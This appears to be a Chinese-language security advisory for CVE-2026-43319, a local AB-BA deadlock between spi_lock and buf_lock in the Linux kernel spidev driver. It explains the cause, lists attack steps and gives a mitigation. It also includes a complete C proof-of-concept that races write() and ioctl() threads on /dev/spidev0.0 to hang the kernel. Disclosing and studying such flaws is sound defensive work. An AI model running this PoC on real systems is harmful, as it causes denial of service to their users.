CVE-2026-43319 CVSS 5.5 中危

CVE-2026-43319: Linux内核spidev驱动死锁漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43319

漏洞类型

竞争条件

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核spidev驱动组件中存在严重的锁反转漏洞。由于write/read路径与ioctl路径分别以相反的顺序获取spi_lock和buf_lock，形成了典型的AB-BA死锁风险。本地攻击者利用多线程并发调用特定接口即可触发死锁，导致系统可用性受损。

技术细节

该漏洞源于Linux内核spidev驱动中互斥锁管理不当导致的死锁问题。驱动内部维护了spi_lock和buf_lock两把互斥锁。在write()和read()系统调用路径中，驱动先获取buf_lock，后获取spi_lock；而在ioctl()路径中，顺序恰恰相反，先获取spi_lock，后获取buf_lock。这种AB-BA模式的锁顺序违反了锁层级原则。当用户空间程序在一个线程中执行写操作，同时在另一个线程中对同一文件描述符执行SPI_IOC_WR_MAX_SPEED_HZ等ioctl操作时，两个线程可能互相持有对方需要的锁并等待释放，从而形成死锁。攻击者无需特殊权限，利用简单的多线程并发代码即可触发该问题，导致内核线程挂起，系统失去响应。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限用户访问权限。

STEP 2

步骤2

攻击者打开目标系统上的spidev设备文件（如/dev/spidev0.0）。

STEP 3

步骤3

攻击者运行恶意程序，创建两个线程分别操作同一文件描述符。

STEP 4

步骤4

一个线程执行write()操作，另一个线程执行ioctl()操作，触发锁顺序不一致。

STEP 5

步骤5

系统内核进入死锁状态，设备停止响应，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <linux/spi/spidev.h>

#define DEVICE "/dev/spidev0.0"

int fd;

// Thread 1: Perform write operation to acquire buf_lock then spi_lock
void* thread_write(void* arg) {
    char buf[32] = {0};
    while (1) {
        write(fd, buf, sizeof(buf));
        usleep(1000);
    }
    return NULL;
}

// Thread 2: Perform ioctl operation to acquire spi_lock then buf_lock
void* thread_ioctl(void* arg) {
    unsigned int speed = 1000000;
    while (1) {
        ioctl(fd, SPI_IOC_WR_MAX_SPEED_HZ, &speed);
        usleep(1000);
    }
    return NULL;
}

int main() {
    fd = open(DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    pthread_t t1, t2;
    pthread_create(&t1, NULL, thread_write, NULL);
    pthread_create(&t2, NULL, thread_ioctl, NULL);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    close(fd);
    return 0;
}

影响范围

Linux Kernel (spidev驱动受影响版本)

防御指南

临时缓解措施

限制非特权用户对/dev/spidev*设备节点的读写访问权限，仅允许授权用户或服务访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表